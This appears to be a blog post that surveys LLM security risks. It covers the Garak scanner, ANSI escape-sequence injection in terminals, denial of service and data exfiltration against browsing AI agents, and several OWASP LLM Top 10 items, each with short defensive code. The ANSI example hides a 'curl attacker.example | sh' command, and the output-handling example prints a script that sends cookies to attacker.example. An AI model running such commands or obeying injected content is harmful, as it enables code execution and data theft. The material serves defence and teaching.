Author name: Martin

Quick overview of Garak – a free LLM vulnerability scanner

The Garak LLM vulnerability scanner is an open-source tool developed by NVIDIA to assess security risks in large language models (LLMs). It automates probing for vulnerabilities such as prompt injection, data leakage, jailbreaking, and other adversarial exploits by running targeted tests against AI models. Garak supports multiple model types, including local and cloud-based LLMs, and generates structured reports highlighting security weaknesses. By leveraging predefined and customizable probes, security researchers and AI developers can use Garak to systematically evaluate model robustness, mitigate risks, and improve AI system resilience against exploitation.
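As a sketch of what a scan looks like in practice, the snippet below assembles a typical Garak command line in Python. The flag names (--model_type, --model_name, --probes) are as documented in Garak's README at the time of writing; check `garak --help` for the version you install, since plugin and probe names evolve.

```python
import shlex

# A typical Garak invocation, assembled as an argument list.
# Probe and flag names are assumptions based on Garak's docs;
# verify against `garak --help` before running.
cmd = [
    "garak",
    "--model_type", "openai",         # connector family for the target
    "--model_name", "gpt-3.5-turbo",  # model under test
    "--probes", "promptinject",       # restrict the run to prompt-injection probes
]
print(shlex.join(cmd))
```

Running without --probes executes the full default probe set, which takes considerably longer but gives broader coverage.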

Prompt Injection into terminals / IDEs via ANSI escape sequences

Prompt injection threats in terminals and IDEs via ANSI escape sequences exploit the ability of these sequences to manipulate what text is displayed, conceal content, or deceive users. Attackers can embed malicious ANSI sequences in logs, error messages, or even code comments that, when viewed in a vulnerable terminal or IDE, rewrite or hide text on screen, spoof trusted output, or trick users into copying and pasting manipulated commands. The risk is especially acute in developer environments, where logs, shell output, and debugging sessions routinely contain untrusted input; without proper sanitization and filtering, it can lead to privilege escalation, data leakage, or unauthorized command execution.
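A minimal sketch of the problem and one mitigation: the log line below uses the CSI sequences ESC[2K (erase line) and ESC[1G (cursor to column 1) to overwrite a malicious command with benign-looking text, and the regex strips CSI sequences before display. This covers only CSI escapes, not OSC or other sequence families, and attacker.example is a placeholder host.

```python
import re

ESC = "\x1b"
# A log line that visually overwrites a malicious command with benign text:
# ESC[2K erases the current line, ESC[1G moves the cursor to column 1.
log_line = f"curl http://attacker.example | sh{ESC}[2K{ESC}[1Gpip install requests"

# Strip CSI escape sequences from untrusted text before displaying it.
# Note: this handles only the CSI family (ESC [ ...), not OSC sequences.
CSI_RE = re.compile(r"\x1b\[[0-9;?]*[ -/]*[@-~]")

def strip_ansi(text: str) -> str:
    return CSI_RE.sub("", text)

print(strip_ansi(log_line))
```

After stripping, the hidden curl command is visible in the stored text, while a raw terminal render would show only the pip line.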

AI Agent Denial of Service (DoS), Rabbit R1, AI Security Expert

When AI agents autonomously browse websites and encounter tasks that are intentionally unsolvable or computationally intensive, they become susceptible to Denial-of-Service (DoS) attacks, leading to resource exhaustion or system paralysis. Malicious actors can craft web pages embedding endless loops, impossible CAPTCHA challenges, or resource-draining scripts specifically designed to trap these automated agents in perpetual execution. As the AI agent persistently attempts to resolve the unsolvable task, it inadvertently consumes significant computational resources, bandwidth, and memory, effectively causing service degradation or downtime. Preventing such attacks necessitates robust timeouts, task-complexity assessments, intelligent anomaly detection, and implementing restrictions on computational resources allocated to AI-driven browsing activities.
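The timeout defense mentioned above can be sketched as a hard wall-clock budget per agent step. This is a minimal illustration, not a production design: Python threads cannot be force-killed, so a stuck step keeps its thread alive until it finishes; a real agent would isolate each step in a subprocess it can actually terminate.

```python
import concurrent.futures
import time

def run_with_budget(fn, *args, timeout_s=2.0):
    """Run one agent step under a hard wall-clock budget.

    Sketch only: a thread blocked in an endless task cannot be killed,
    so production agents should run steps in separate processes.
    """
    pool = concurrent.futures.ThreadPoolExecutor(max_workers=1)
    future = pool.submit(fn, *args)
    try:
        return future.result(timeout=timeout_s)
    except concurrent.futures.TimeoutError:
        return None  # budget exceeded: abandon the task
    finally:
        pool.shutdown(wait=False)

# An "unsolvable" page interaction, simulated here with a sleep
print(run_with_budget(time.sleep, 0.5, timeout_s=0.05))  # exceeds budget
print(run_with_budget(lambda: "done", timeout_s=1.0))    # completes in time
```

Pairing the budget with per-task retry limits prevents an agent from simply re-queuing the same trap page after each timeout.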

AI Agent Data Exfiltration, Rabbit R1, AI Security Expert

AI agents that autonomously browse the web introduce significant security risks, particularly related to data exfiltration through covert copy-and-paste operations to attacker-controlled servers. Such agents, when compromised or inadequately secured, can inadvertently or maliciously transfer sensitive information obtained during browsing activities—including user credentials, proprietary business data, or confidential communications—directly into adversarial hands. Attackers exploit the autonomous nature of these AI agents, inserting scripts or leveraging deceptive interfaces to manipulate clipboard operations, thereby exfiltrating valuable data silently and efficiently. Mitigating this risk requires stringent security controls, such as sandboxed environments, strict access management, continuous monitoring of AI activities, and robust detection mechanisms that identify abnormal behaviors indicative of potential data theft.
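One of the controls above, strict access management for agent network traffic, can be sketched as an egress allowlist: the agent sandbox permits requests only to approved hosts, so a clipboard- or script-driven exfiltration attempt to an attacker server is blocked. The host names here are hypothetical placeholders.

```python
from urllib.parse import urlparse

# Hypothetical egress allowlist for an agent sandbox: any request to a
# host outside this set is denied (and would be logged for review).
ALLOWED_HOSTS = {"docs.example.com", "api.example.com"}

def egress_permitted(url: str) -> bool:
    host = (urlparse(url).hostname or "").lower()
    return host in ALLOWED_HOSTS

print(egress_permitted("https://docs.example.com/page"))   # allowed
print(egress_permitted("https://attacker.example/paste"))  # blocked
```

An allowlist is deliberately restrictive; denylists fail open against attacker-controlled domains the defender has never seen.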

OWASP Top 10 LLM07:2025 System Prompt Leakage

System Prompt Leakage refers to the risk that system prompts—internal instructions guiding the behavior of Large Language Models (LLMs)—may inadvertently contain sensitive information, such as credentials or internal rules, which, if exposed, can be exploited by attackers to compromise the system’s security.

OWASP Top 10 LLM06:2025 Excessive Agency

Excessive Agency refers to the vulnerability arising when Large Language Models (LLMs) are granted more functionality, permissions, or autonomy than necessary, enabling them to perform unintended or harmful actions due to unexpected, ambiguous, or manipulated outputs.

OWASP Top 10 LLM05:2025 Improper Output Handling

Improper Output Handling refers to the inadequate validation and sanitization of outputs generated by Large Language Models (LLMs) before they are processed by other systems, potentially leading to security vulnerabilities such as remote code execution, cross-site scripting (XSS), or SQL injection.
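For the XSS case specifically, the core mitigation is to treat model output like any other untrusted user input before it reaches a downstream system. A minimal sketch using Python's standard library HTML escaping (SQL injection would analogously call for parameterized queries, and shell execution for strict argument quoting):

```python
import html

def render_llm_output(raw: str) -> str:
    """Escape model output before embedding it in an HTML page."""
    return html.escape(raw)  # escapes < > & " '

# An adversarial completion that would execute if rendered verbatim
payload = '<script>fetch("https://attacker.example/?c=" + document.cookie)</script>'
print(render_llm_output(payload))
```

Escaping at the point of output is context-specific: HTML escaping protects an HTML sink, but an LLM response flowing into SQL or a shell needs that sink's own defenses instead.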